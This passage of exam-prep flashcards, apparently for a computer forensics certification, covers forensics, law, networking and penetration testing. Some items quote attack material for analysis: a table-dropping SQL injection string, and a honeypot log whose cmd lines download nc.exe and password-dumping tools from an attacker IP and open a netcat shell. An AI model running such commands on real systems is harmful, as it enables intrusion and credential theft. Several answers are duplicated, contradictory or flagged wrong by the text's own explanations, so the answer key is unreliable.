invents a new machine, process, useful composition of matter or manufacture?

A

Utility patent

300
Q

Which response organization tracks hoaxes as well as viruses?

A

CIAC

Explanation: Note: CIAC (Computer Incident Advisory Capability) Was run by the US Department of energy

301
Q

Why would a company issue a dongle with the software they sell?

A

To provide copyright protection

302
Q

You have used a newly released forensic investigation tool, which doesnt meet the
Daubert Test, during a case. The case has ended-up in court. What argument could
the defense make to weaken your case?

A

The total has not been reviewed and accepted by your peers

303
Q

Software firewalls work at which layer of the OSI model?

A

Data Link

304
Q

George is a senior security analyst working for a state agency in Florida. His state’s
congress just passed a bill mandating every state agency to undergo a security audit
annually. After learning what will be required, George needs to implement an IDS as soon
as possible before the first audit occurs. The state bill requires that an IDS with a “time-
based induction machine” be used. What IDS feature must George implement to meet this
requirement?

A

Real-time anomaly detection

305
Q

When operating systems mark a cluster as used but not allocated, the cluster is considered
as _________

A

Lost

306
Q

What is a good security method to prevent unauthorized users from “tailgating”?

A

Man trap

307
Q

What type of analysis helps to identify the time and sequence of events in an investigation?

A

Temporal

308
Q

Why are Linux/Unix based computers better to use than Windows computers for idle
scanning?

A

Windows computers are constantly talking

309
Q

If a suspect computer is located in an area that may have toxic chemicals, you must:

A

coordinate with the HAZMAT team

310
Q

Corporate investigations are typically easier than public investigations because:

A

the investigator does not have to get a warrant

311
Q

You are conducting an investigation of fraudulent claims in an insurance company
that involves complex text searches through large numbers of documents. Which of
the following tools would allow you to quickly and efficiently search for a string
within a file on the bitmap image of the target computer?

A

grep

312
Q

Kimberly is studying to be an IT security analyst at a vocational school in her town. The
school offers many different programming as well as networking languages. What
networking protocol language should she learn that routers utilize?

A

OSPF

313
Q

During the course of a corporate investigation, you find that an employee is committing a
federal crime. Can the employer file a criminal complain with the police?

A

Yes, and all evidence can be turned over to the police

314
Q

In Microsoft file structures, sectors are grouped together to form:

A

Clusters

315
Q

What does ICMP Type 3/Code 13 mean?

A

Administratively Blocked

316
Q

A packet is sent to a router that does not have the packet destination address in its route
table, how will the packet get to its properA packet is sent to a router that does not have the
packet? destination address in its route table, how will the packet get to its proper
destination?

A

Gateway of last resort

317
Q

The following excerpt is taken from a honeypot log. The log captures activities
across three days. There are several intrusion attempts; however, a few are
successful.
(Note: The objective of this question is to test whether the student can read basic
information from log entries and interpret the nature of attack.)
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 ->
172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 ->
172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 ->
172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 ->
172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by
(uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by
simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 ->
213.28.22.189:4558
From the options given below choose the one which best interprets the following entry:
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

A

An IDS evasion technique

318
Q

Lance wants to place a honeypot on his network. Which of the following would be
your recommendations?

A

It doesn’t matter as all replies are faked

319
Q

You should make at least how many bit-stream copies of a suspect drive?

A

2

320
Q

An employee is suspected of stealing proprietary information belonging to your company
that he had no rights to possess. The information was stored on the employee computer
that was protected with the NTFS Encrypted File System (EFS) and you had observed him
copy the files to astored on the employee? computer that was protected with the NTFS
Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just
before leaving work for the weekend. You detain the employee before he leaves the
building and recover the floppy disk and secure his computer. Will you be able to break the
encryption so that you can verify that the employee was in possession of the proprietary
information?

A

When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can recover the information

321
Q

You have compromised a lower-level administrator account on an Active Directory network
of a small company in Dallas, Texas. You discover Domain Controllers through
enumeration. You connect to one of the Domain Controllers on port 389 using ldp.exe.
What are you trying to accomplish here?

A

Enumerate domain user accounts and built-in groups

322
Q

James is testing the ability of his routers to withstand DoS attacks. James sends ICMP
ECHO requests to the broadcast address of his network. What type of DoS attack is James
testing against his network?

A

Smurf

Explanation: The Fraggle attack is like a smurf attack, but uses UDP packets and not ICMP.

323
Q

If you come across a sheepdip machine at your client site, what would you infer?

A

A sheepdip computer is used only for virus-checking.

324
Q

Area density refers to:

A

the amount of data per disk

the amount of data per square inch

325
Q

This is the original file structure database that Microsoft originally designed for
floppy disks. It is written to the outermost track of a disk and contains information
about each file stored on the drive.

A

File Allocation Table (FAT)
Explanation: A MBR is usually found on fixed disks, not floppy. A MFT is part of NTFS, and NTFS is not used on floppy DOS is an operating system, not a file structure database

326
Q

Microsoft Outlook maintains email messages in a proprietary format in what type of file?

A

.pst

327
Q

Simon is a former employee of Trinitron XML Inc. He feels he was wrongly terminated and
wants to hack into his former company’s network. Since Simon remembers some of the
server names, he attempts to run the axfr and ixfr commands using DIG. What is Simon
trying to accomplish here?

A

Perform a zone transfer

328
Q

How many sectors will a 125 KB file use in a FAT32 file system?

A

250
Explanation: If you assume that we are using 512 bytes sectors, then 125x1024/512 = 250 sectors would be needed. Actually, this is the same for a FAT16 file system as well.

329
Q

Diskcopy is:

A

a standard MS-DOS command
Explanation: diskcopy is a STANDARD DOS utility. C:\WINDOWS>diskcopy /? Copies the contents of one floppy disk to another.

330
Q

Profiling is a forensics technique for analyzing evidence with the goal of identifying
the perpetrator from their various activity. After a computer has been compromised
by a hacker, which of the following would be most important in forming a profile of
the incident?

A

The logic, formatting and elegance of the code used in the attack

331
Q

You have been asked to investigate after a user has reported a threatening e-mail
they have received from an external source. Which of the following are you most
interested in when trying to trace the source of the message?

A

The E-mail Header

332
Q

Which part of the Windows Registry contains the user’s password file?

A

HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
Explanation: The answer is HKEY_CURRENT_USER\Identities{VALUE} Note the users password file will be user specific, the Local Machine is the machine information

333
Q

After attending a CEH security seminar, you make a list of changes you would like to
perform on your network to increase its security. One of the first things you change is to
switch the RestrictAnonymous setting from 0 to 1 on your servers. This, as you were told,
would prevent anonymous users from establishing a null session on the server. Using
Userinfo tool mentioned at the seminar, you succeed in establishing a null session with one
of the servers. Why is that?

A

RestrictAnonymous must be set to “2” for complete security

334
Q

You are employed directly by an attorney to help investigate an alleged sexual harassment
case at a large pharmaceutical manufacturer. While at the corporate office of the company,
the CEO demands to know the status of the investigation. What prevents you from
discussing the case with the CEO?

A

The attorney-work-product rule

335
Q

When a router receives an update for its routing table, what is the metric value change to
that path?

A

Increased by 1

336
Q

During the course of an investigation, you locate evidence that may prove the
innocence of the suspect of the investigation. You must maintain an unbiased
opinion and be objective in your entire fact finding process. Therefore you report
this evidence. This type of evidence is known as:

A

exculpatory evidence

337
Q

You are working on a thesis for your doctorate degree in Computer Science. Your thesis is
based on HTML, DHTML, and other web-based languages and how they have evolved
over the years. You navigate to archive. org and view the HTML code of news.com. You
then navigate to the current news.com website and copy over the source code. While
searching through the code, you come across something abnormal: What have you found?

A

Web bug

338
Q

After undergoing an external IT audit, George realizes his network is vulnerable to DDoS
attacks. What countermeasures could he take to prevent DDoS attacks?

A

Disable direct broadcasts

339
Q

You are working for a large clothing manufacturer as a computer forensics investigator and
are called in to investigate an unusual case of an employee possibly stealing clothing
designs from the company and selling them under a different brand name for a different
company. What you discover during the course of the investigation is that the clothing
designs are actually original products of the employee and the company has no policy
against an employee selling his own designs on his own time. The only thing that you can
find that the employee is doing wrong is that his clothing design incorporates the same
graphic symbol as that of the company with only the wording in the graphic being different.
What area of the law is the employee violating?

A

Trademark law

340
Q

George is performing security analysis for Hammond and Sons LLC. He is testing security
vulnerabilities of their wireless network. He plans on remaining as “stealthy” as possible
during the scan. Why would a scanner like Nessus is not recommended in this situation?

A

Nessus is too loud

341
Q

The ____________________ refers to handing over the results of private
investigations to the authorities because of indications of criminal activity.

A

Silver-Platter Doctrine
Explanation: Answer Silver-Platter Doctrine is probably the most correct. However, the Silver-Platter Doctrine allowed the Federal court to introduce illegally or improperly State seized evidence as long as Federal officers had no role in obtaining it. Also wanted to note that this Doctrine was declared unconstitional in 1960, Elkins vs United States

342
Q

Julie is a college student majoring in Information Systems and Computer Science. She is
currently writing an essay for her computer crimes class. Julie paper focuses on white-
collar crimes in America and how forensics investigators investigate the cases. Julie would
like to focus the subjectJulie? paper focuses on white-collar crimes in America and how
forensics investigators investigate the cases. Julie would like to focus the subject of the
essay on the most common type of crime found in corporate America. What crime should
Julie focus on?

A

Industrial espionage

343
Q

Law enforcement officers are conducting a legal search for which a valid warrant
was obtained. While conducting the search, officers observe an item of evidence for
an unrelated crime that was not included in the warrant. The item was clearly visible
to the officers and immediately identified as evidence. What is the term used to
describe how this evidence is admissible?

A

Plain view doctrine

344
Q

You have been called in to help with an investigation of an alleged network intrusion. After
questioning the members of the company ITYou have been called in to help with an
investigation of an alleged network intrusion. After questioning the members of the
company? IT department, you search through the server log files to find any trace of the
intrusion. After that you decide to telnet into one of the company routers to see if there is
any evidence to be found. While connected to the router, you see some unusual activity
and believe that the attackers are currently connected to that router. You start up an
ethereal session to begin capturing traffic on the router that could be used in the
investigation. At what layer of the OSI model are you monitoring while watching traffic to
and from the router?

A

Network

345
Q

Jones had been trying to penetrate a remote production system for the past two weeks.
This time however, he is able to get into the system. He was able to use the system for a
period of three weeks. However law enforcement agencies were recording his every
activity and this was later presented as evidence. The organization had used a virtual
environment to trap Jones. What is a virtual environment?

A

A honeypot that traps hackers

346
Q

Larry is an IT consultant who works for corporations and government agencies. Larry plans
on shutting down the city’s network using BGP devices and zombies? What type of
Penetration Testing is Larry planning to carry out?

A

DoS Penetration Testing

347
Q

If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an
investigation, what can you conclude?

A

Nothing in particular as these can be operational files

348
Q

In what way do the procedures for dealing with evidence in a criminal case differ
from the procedures for dealing with evidence in a civil case?

A

evidence in a criminal case must be secured more tightly than in a civil case

349
Q

T or F: If you discover a criminal act while investigating a corporate policy abuse, it becomes a
public-sector investigation and should be referred to law enforcement?

A

True

350
Q

A(n) _____________________ is one thats performed by a computer program rather
than the attacker manually performing the steps in the attack sequence.

A

automated attack

351
Q

The police believe that Mevin Matthew has been obtaining unauthorized access to
computers belonging to numerous computer software and computer operating systems
manufacturers, cellular telephone manufacturers, Internet Service Providers, and
educational institutions. They also suspect that he has been stealing, copying, and
misappropriating proprietary computer software belonging to the several victim companies.
What is preventing the police from breaking down the suspect door and searching his
home and seizing all of his computer equipment if they haveis preventing the police from
breaking down the suspect? door and searching his home and seizing all of his computer
equipment if they have not yet obtained a warrant?

A

The Fourth Amendment

352
Q

Terri works for a security consulting firm that is currently performing a penetration test on
First National Bank in Tokyo. Terri’s duties include bypassing firewalls and switches to gain
access to the network. Terri sends an IP packet to one of the company’s switches with
ACK bit and the source address of her machine set. What is Terri trying to accomplish by
sending this IP packet?

A

Trick the switch into thinking it already has a session with Terri’s computer

353
Q

An “idle” system is also referred to as what?

A

Zombie

354
Q

When monitoring for both intrusion and security events between multiple computers, it is
essential that the computers’ clocks are synchronized. Synchronized time allows an
administrator to reconstruct what took place during an attack against multiple computers.
Without synchronized time, it is very difficult to determine exactly when specific events took
place, and how events interlace. What is the name of the service used to synchronize time
among multiple computers?

A

Network Time Protocol

355
Q

When reviewing web logs, you see an entry for resource not found in the HTTP
status code filed. What is the actual error code that you would see in the log for
resource not found?

A

404

356
Q

You are assisting a Department of Defense contract company to become compliant with
the stringent security policies set by the DoD. One such strict rule is that firewalls must only
allow incoming connections that were first initiated by internal computers. What type of
firewall must you implement to abide by this policy?

A

Statefull firewall

357
Q

You are assigned to work in the computer forensics lab of a state police agency. While
working on a high profile criminal case, you have followed every applicable procedure,
however your boss is still concerned that the defense attorney might question wheather
evidence has been changed while at the lab. What can you do to prove that the evidence is
the same as it was when it first entered the lab?

A

Make MD5 hashes of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab

358
Q

What type of flash memory card comes in either Type I or Type II and consumes only five
percent of the power required by small hard drives?

A

CF memory

359
Q

The use of warning banners helps a company avoid litigation by overcoming an employees
assumed _________ when connecting to the company intranet, network, or virtual private
network (VPN) and will allow the company investigators to monitor, search, and
retrievecompany? intranet, network, or virtual private network (VPN) and will allow the
company? investigators to monitor, search, and retrieve information stored within the
network.

A

Right of privacy

360
Q

What are the security risks of running a “repair” installation for Windows XP?

A

Pressing Shift+F10 gives the user administrative rights

361
Q

If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an
investigation, what can you conclude?

A

The system has been compromised using a t0rn rootkit

362
Q

What will the following command produce on a website login page?
SELECT email, passwd, login_id, full_name FROM members
WHERE email = ‘someone@somehwere.com’;
DROP TABLE members; –’

A

Deletes the entire members table

Explanation: The third line deletes the table named members.

363
Q

You are contracted to work as a computer forensics investigator for a regional bank that
has four 30 TB storage area networks that store customer data. What method would be
most efficient for you to acquire digital evidence from this network?

A

Create a sparse data copy of a folder or file

364
Q

You are a security analyst performing a penetration tests for a company in the Midwest.
After some initial reconnaissance, you discover the IP addresses of some Cisco routers
used by the company. You type in the following URL that includes the IP address of one of
the routers:
http://172.168.4.131/level/99/exec/show/config
After typing in this URL, you are presented with the entire configuration file for that router.
What have you discovered?

A

HTTP Configuration Arbitrary Administrative Access Vulnerability

365
Q

Where is the startup configuration located on a router?

A

NVRAM

366
Q

To calculate the number of bytes on a disk, the formula is: CHS**

A

number of cylinders x number of heads x number of sides x 512 bytes per sector
Explanation: Although D in this question is probably the closest, the answer may have been transcribed incorrectly. CHS stands for Cylinder Head Sector, and S is not sides. Each side of a platter of a disk has its own head. A cylinder is an alignment of all tracks under one head position. So the answer is number of cylinders x number of heads x number of sectors (per track) x 512 bytes per sector (assuming that is the sector size as some disks may have larger sector sizes). The number of tracks per side of disk, or the number of tracks that a single head can access is equal to the number of cylinders.

367
Q

Which of the following is NOT a graphics file?

A

Picture3.nfo

368
Q

John and Hillary works at the same department in the company. John wants to find out
Hillary’s network password so he can take a look at her documents on the file server. He
enables Lophtcrack program to sniffing mode. John sends Hillary an email with a link to
Error! Reference source not found. What information will he be able to gather from this?

A

Hillary network username and password hash

369
Q

Study the log given below and answer the following question:
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 ->
172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 ->
172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 ->
172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 ->
172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by
(uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by
simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 ->
213.28.22.189:4558
Precautionary measures to prevent this attack would include writing firewall rules.
Of these firewall rules, which among the following would be appropriate?

A

Disallow UDP 53 in from outside to DNS server

370
Q

You are trying to locate Microsoft Outlook Web Access Default Portal using Google search
on the Internet. What search string will you use to locate them?

A

allinurl:”exchange/logon.asp”

371
Q

What method of computer forensics will allow you to trace all ever-established user
accounts on a Windows 2000 server the course of its lifetime?

A

review of SIDs in the Registry

372
Q

Bill is the accounting manager for Grummon and Sons LLC in Chicago. On a regular basis,
he needs to send PDF documents containing sensitive information through E-mail to his
customers. Bill protects the PDF documents with a password and sends them to their
intended recipients. Why PDF passwords do not offer maximum protection?

A

PDF passwords can easily be cracked by software brute force tools

373
Q

Harold is a web designer who has completed a website for ghttech.net. As part of the
maintenance agreement he signed with the client, Harold is performing research online and
seeing how much exposure the site has received so far. Harold navigates to google.com
and types in the following search. link:www.ghttech.net What will this search produce?

A

All sites that link to ghttech.net

374
Q

What is kept in the following directory? HKLM\SECURITY\Policy\Secrets

A

Service account passwords in plain text

375
Q

The following excerpt is taken from a honeypot log that was hosted at
lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File
Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run
in arbitrary folders that do not normally have the right to run scripts. The attacker
tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a
malicious user to construct SQL statements that will execute shell commands (such
as CMD.EXE) on the IIS server. He does a quick query to discover that the directory
exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker
makes a RDS query which results in the commands run as shown below.
“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k&raquo_space;ftpcom”
“cmd1.exe /c echo haxedj00&raquo_space;ftpcom”
“cmd1.exe /c echo get nc.exe&raquo_space;ftpcom”
“cmd1.exe /c echo get pdump.exe&raquo_space;ftpcom”
“cmd1.exe /c echo get samdump.dll&raquo_space;ftpcom”
“cmd1.exe /c echo quit&raquo_space;ftpcom”
“cmd1.exe /c ftp -s:ftpcom”
“cmd1.exe /c nc -l -p 6969 -e cmd1.exe”
What can you infer from the exploit given?

A

The attack is a remote exploit and the hacker downloads three files
Explanation: Explanation: The log clearly indicates that this is a remote exploit with three files being downloaded

376
Q

You are working as an independent computer forensics investigator and receive a call from
a systems administrator for a local school system requesting your assistance. One of the
students at the local high school is suspected of downloading inappropriate images from
the Internet to a PC in the Computer Lab. When you arrive at the school, the systems
administrator hands you a hard drive and tells you that he made a implePC in the
Computer Lab. When you arrive at the school, the systems administrator hands you a hard
drive and tells you that he made a ?imple backup copy?of the hard drive in the PC and put
it on this drive and requests that you examine the drive for evidence of the suspected
images. You inform him that a imple backup copy?will not provide deleted files or recover
file fragments. What type of copy do you need to make toYou inform him that a ?imple
backup copy?will not provide deleted files or recover file fragments. What type of copy do
you need to make to ensure that the evidence found is complete and admissible in future
proceedings?

A

Bit-stream copy

377
Q

What will the following command accomplish in Linux? fdisk /dev/hda

A

Partition the hard drive

378
Q

A law enforcement officer may only search for and seize criminal evidence with
_______________________, which are facts or circumstances that would lead a
reasonable person to believe a crime has been committed or is about to be
committed, evidence of the specific crime exists and the evidence of the specific
crime exists at the place to be searched.

A

Probable cause

379
Q

Sniffers that place NICs in promiscuous mode work at what layer of the OSI model?

A

Physical

380
Q

At what layer of the OSI model do routers function on?

A

3

381
Q

Paul’s company is in the process of undergoing a complete security audit including logical
and physical security testing. After all logical tests were performed; it is now time for the
physical round to begin. None of the employees are made aware of this round of testing.
The security-auditing firm sends in a technician dressed as an electrician. He waits outside
in the lobby for some employees to get to work and follows behind them when they access
the restricted areas. After entering the main office, he is able to get into the server room
telling the IT manager that there is a problem with the outlets in that room. What type of
attack has the technician performed?

A

Tailgating

382
Q

In a FAT32 system, a 123 KB file will use how many sectors?

A

246

Explanation: If you assume that we are using 512 bytes sectors, then 123x1024/512 = 246 sectors would be needed.

383
Q

One technique for hiding information is to change the file extension from the correct
one to one that might not be noticed by an investigator. For example, changing a
.jpg extension to a .doc extension so that a picture file appears to be a document.
What can an investigator examine to verify that a file has the correct extension?

A

the file header

384
Q

When a file is deleted by Windows Explorer or through the MS-DOS delete
command, the operating system inserts _______________ in the first letter position
of the filename in the FAT database.

A

The lowercase Greek Letter Sigma (s)
Explanation: When a file is deleted, the first byte is replaced with 0xE5 to marked the file as deleted or erased, and is the same for FAT12/16/32. An 0xE5 translates also to a ASCII 229, a O with a tilde. However, using the greek alphabet (see: http://www.ascii.ca/iso8859.7.htm) the ASCII code 229 is the lowercase Greek Letter Epsilon, and Ascii code 243 is Lower case Greek Letter Sigma. http://chexed.com/ComputerTips/asciicodes.php says that Ascii 229 is Lowercase Greek Letter Sigma So, although D looks like the correct answer here, it may require more understanding of the underlying intent of the question.

385
Q

As a security analyst you setup a false survey website that will reQuire users to create a
username and a strong password. You send the link to all the employees of the company.
What information will you be able to gather?

A

The employees network usernames and passwords

386
Q

Printing under a Windows Computer normally requires which one of the following
files types to be created?

A

EMF

387
Q

What will the following command accomplish? C:> nmap -v -sS -Po 172.16.28.251 -
data_length 66000 -
packet_trace

A

Test ability of a router to handle over-sized packets

388
Q

Jim performed a vulnerability analysis on his network and found no potential problems. He
runs another utility that executes exploits against his system to verify the results of the
vulnerability test. The second utility executes five known exploits against his network in
which the vulnerability analysis said were not exploitable. What kind of results did Jim
receive from his vulnerability analysis?

A

False negatives

389
Q

When using Windows acquisitions tools to acquire digital evidence, it is important to use a
well-tested hardware write-blocking device to _________

A

Prevent contamination to the evidence drive

390
Q

What is the target host IP in the following command? C:> firewalk -F 80 10.10.150.1
172.16.28.95 -p UDP

A

172.16.28.95

391
Q

What will the following Linux command accomplish? dd if=/dev/mem
of=/home/sam/mem.bin bs=1024

A

Copy the running memory to a file

392
Q

You are a computer forensics investigator working with local police department and
you are called to assist in an investigation of threatening emails. The complainant
has printed out 27 email messages from the suspect and gives the printouts to you.
You inform her that you will need to examine her computer because you need
access to the _________________________ in order to track the emails back to the
suspect.

A

Email Header

393
Q

Click on the Exhibit Button Paulette works for an IT security consulting company that is
currently performing an audit for the firm ACE Unlimited. Paulette’s duties include logging
on to all the company’s network equipment to ensure IOS versions are up-to-date and all
the other security settings are as stringent as possible. Paulette presents the following
screenshot to her boss so he can inform the client about necessary changes need to be
made. From the screenshot, what changes should the client company make?

A

Remove any identifying numbers, names, or version information

394
Q

Frank is working on a vulnerability assessment for a company on the West coast. The
company hired Frank to assess its network security through scanning, pen tests, and
vulnerability assessments. After discovering numerous known vulnerabilities detected by a
temporary IDS he set up, he notices a number of items that show up as unknown but
Questionable in the logs. He looks up the behavior on the Internet, but cannot find anything
related. What organization should Frank submit the log to find out if it is a new vulnerability
or not?

A

CVE

395
Q

Chris has been called upon to investigate a hacking incident reported by one of his clients.
The company suspects the involvement of an insider accomplice in the attack. Upon
reaching the incident scene, Chris secures the physical area, records the scene using
visual media. He shuts the system down by pulling the power plug so that he does not
disturb the system in any way. He labels all cables and connectors prior to disconnecting
any. What do you think would be the next sequence of events?

A

Prepare the system for acquisition; Connect the target media; Copy the media; Secure the evidence

396
Q

When investigating a computer forensics case where Microsoft Exchange and Blackberry
Enterprise server are used, where would investigator need to search to find email sent from
a Blackberry device?

A

Microsoft Exchange server

397
Q

What binary coding is used most often for e-mail purposes?

A

MIME

398
Q

You are running known exploits against your network to test for possible vulnerabilities. To
test the strength of your virus software, you load a test network to mimic your production
network. Your software successfully blocks some simple macro and encrypted viruses. You
decide to really test the software by using virus code where the code rewrites itself entirely
and the signatures change from child to child, but the functionality stays the same. What
type of virus is this that you are testing?

A

Metamorphic

399
Q

On Linux/Unix based Web servers, what privilege should the daemon service be run
under?

A

Something other than root

400
Q

What type of attack sends spoofed UDP packets (instead of ping packets) with a fake
source address to the IP broadcast address of a large network?

A

Fraggle

401
Q

The MD5 program is used to:

A

verify that a disk is not altered when you examine it

402
Q

In General, __________________ Involves the investigation of data that can be
retrieved from the hard disk or other disks of a computer by applying scientific
methods to retrieve the data.

A

Computer Forensics

403
Q

With the standard Linux second extended file system (Ext2fs), a file is deleted when the
inode internal link count reaches ______

A

0

404
Q

Jonathan is a network administrator who is currently testing the internal security of his
network. He is attempting to hijack a session, using Ettercap, of a user connected to his
Web server. Why will Jonathan not succeed?

A

HTTP protocol does not maintain session

405
Q

Michael works for Kimball Construction Company as senior security analyst. As part of
yearly security audit, Michael scans his network for vulnerabilities. Using Nmap, Michael
conducts XMAS scan and most of the ports scanned do not give a response. In what state
are these ports?

A

Open

406
Q

You are carrying out the last round of testing for your new website before it goes live. The
website has many dynamic pages and connects to a SQL backend that accesses your
product inventory in a database. You come across a web security site that recommends
inputting the following code into a search field on web pages to check for vulnerabilities:
When you type this and click on search, you receive a pop-up window that says:
“This is a test.” What is the result of this test?

A

Your website is vulnerable to CSS

407
Q

In a computer forensics investigation, what describes the route that evidence takes from
the time you find it until the case is closed or goes to court?

A

Chain of custody

408
Q

You work as an IT security auditor hired by a law firm in Boston to test whether you can
gain access to sensitive information about the company clients. You have rummaged
through their trash and found very little information. You do not want to set off any alarms
on their network, so you plan on performing passive footprinting against their Web servers.
What tool should you use?

A

Netcraft

409
Q

Why is it a good idea to perform a penetration test from the inside?

A

Because 70% of attacks are from inside the organization

410
Q

John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a
sniffer located on a subnet that resides deep inside his network. After analyzing the sniffer
log files, he does not see any of the traffic produced by Firewalk. Why is that?

A

Firewalk sets all packets with a TTL of one

411
Q

What is the name of the standard Linux command that can be used to create bit-stream
images?

A

dd

412
Q

From the following spam mail header, identify the host IP that sent this spam?
From jie02@netvigator.com jie02@netvigator.com Tue Nov 27 17:27:11 2001
Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk
(8.11.6/8.11.6) with ESMTP id
fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)
Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by
viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1)
with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)
Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk
From: “china hotel web”
To: “Shlam”
Subject: SHANGHAI (HILTON HOTEL) PACKAGE
Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0
X-Priority: 3 X-MSMail-
Priority: Normal
Reply-To: “china hotel web”

A

203.218.39.20

413
Q

All Blackberry email is eventually sent and received through what proprietary RIM-operated
mechanism?

A

Blackberry Message Center

414
Q

Jessica works as systems administrator for a large electronics firm. She wants to scan her
network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is
Jessica going to perform?

A

ICMP ping sweep

415
Q

Melanie was newly assigned to an investigation and asked to make a copy of all the
evidence from the compromised system. Melanie did a DOS copy of all the files on
the system. What would be the primary reason for you to recommend a disk imaging
tool?

A

A simple DOS copy will not include deleted files, file slack and other information

416
Q

Before performing a logical or physical search of a drive in Encase, what must be added to
the program?

A

Keywords

417
Q

____________________ is simply the application of Computer Investigation and
analysis techniques in the interests of determining potential legal evidence.

A

Computer Forensics

418
Q

When investigating a Windows System, it is important to view the contents of the
page or swap file because:

A

A Large volume of data can exist within the swap file of which the computer user has no knowledge

419
Q

On an Active Directory network using NTLM authentication, where on the domain
controllers are the passwords stored?

A

SAM

420
Q

You are working for a local police department that services a population of 1,000,000
people and you have been given the task of building a computer forensics lab. How
many law-enforcement computer investigators should you request to staff the lab?

A

4

421
Q

You are the security analyst working for a private company out of France. Your current
assignment is to obtain credit card information from a Swiss bank owned by that company.
After initial reconnaissance, you discover that the bank security defenses are very strong
and would take too long to penetrate. You decide to get the information by monitoring the
traffic between the bank and one of its subsidiaries in London. After monitoring some of the
traffic, you see a lot of FTP packets traveling back and forth. You want to sniff the traffic
and extract usernames and passwords. What tool could you use to get this informati

A

Ettercap

422
Q

You are assigned to work in the computer forensics lab of a state police agency.
While working on a high profile criminal case, you have followed every applicable
procedure, however your boss is still concerned that the defense attorney might
question whether evidence has been changed while at the lab. What can you do to
prove that the evidence is the same as it was when it first entered the lab?

A

make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab

423
Q

Click on the Exhibit Button To test your website for vulnerabilities, you type in a Quotation
mark (? for the username field. After you click Ok, you receive the following error message
window: What can you infer from this error window?

A

SQL injection is possible

424
Q

Which of the following should a computer forensics lab used for investigations
have?

A

restricted access

425
Q

You just passed your ECSA exam and are about to start your first consulting job running
security audits for a financial institution in Los Angeles. The IT manager of the company
you will be working for tries to see if you remember your ECSA class. He asks about the
methodology you will be using to test the company’s network. How would you answer?

A

LPT Methodology

426
Q

Before you are called to testify as an expert, what must an attorney do first?

A

qualify you as an expert witness

427
Q

Why should you note all cable connections for a computer you want to seize as
evidence?

A

to know what outside connections existed

428
Q

Which of the following refers to the data that might still exist in a cluster even
